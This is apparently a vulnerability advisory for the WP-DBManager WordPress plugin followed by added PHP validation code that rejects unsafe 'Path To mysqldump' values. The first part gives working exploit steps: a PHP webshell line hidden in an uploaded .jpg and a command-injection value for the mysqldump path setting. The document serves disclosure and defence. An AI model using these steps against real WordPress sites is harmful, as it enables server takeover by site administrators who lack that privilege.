The plugin does not prevent administrators from running arbitrary commands on the server in multisite installations, where only super-administrators should be able to do so.
# Use any WordPress plugin that allows users to upload files; the ".php" extension is not required, for example .jpg (many plugins allow such extensions)
# Upload your malicious file, for example: test_rce.jpg with the following content:
<?php system("COMMAND"); ?>
# Go to "DB Options" under the WP-DBManager plugin
# Set the payload below as the value of the "Path To mysqldump" parameter:
/usr/bin/php /var/www/blog/test_rce.jpg
# Go to "Backup DB" and click on the "Backup" button
# The command will get executed without any issues
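
The steps above work because the "Path To mysqldump" value is accepted as free text from a site administrator. The following is an added example, not code from WP-DBManager or from this advisory, showing one way to check such a value before it is saved; the function names are hypothetical and a Linux host is assumed.

```php
<?php
// Added example (not WP-DBManager code). Function names are hypothetical.

/**
 * Return the reasons to reject a "Path To mysqldump" value.
 * An empty array means the value looks like a bare path to the binary.
 */
function mysqldump_path_problems(string $value): array
{
    $problems = [];
    $value = trim($value);
    // A path setting must be a single token: whitespace means an
    // interpreter plus an argument, as in the value shown in the steps.
    if (preg_match('/\s/', $value)) {
        $problems[] = 'contains whitespace';
    }
    // Shell metacharacters have no place in a binary path.
    if (preg_match('/[;&|`$<>(){}"\'*?!#~]/', $value)) {
        $problems[] = 'contains shell metacharacters';
    }
    // Must be absolute and must name mysqldump itself, not another program.
    if ($value === '' || $value[0] !== '/') {
        $problems[] = 'not an absolute path';
    }
    if (basename($value) !== 'mysqldump') {
        $problems[] = 'basename is not mysqldump';
    }
    return $problems;
}

/**
 * Decide whether the setting may be saved. In WordPress the two flags
 * would come from is_multisite() and is_super_admin().
 */
function may_save_mysqldump_path(string $value, bool $isMultisite, bool $isSuperAdmin): bool
{
    if ($isMultisite && !$isSuperAdmin) {
        return false; // site admins on a network must not set executable paths
    }
    return mysqldump_path_problems($value) === [];
}

// Constructed sample values; the second is the value from the steps above.
$samples = ['/usr/bin/mysqldump', '/usr/bin/php /var/www/blog/test_rce.jpg', 'mysqldump'];
foreach ($samples as $s) {
    $p = mysqldump_path_problems($s);
    printf("%-42s %s\n", $s, $p ? 'REJECT: ' . implode(', ', $p) : 'ok');
}
// A site administrator (not super-admin) on a multisite network:
var_dump(may_save_mysqldump_path('/usr/bin/mysqldump', true, false));
```

The same function can be run over the stored option value of existing sites to flag settings that were already changed.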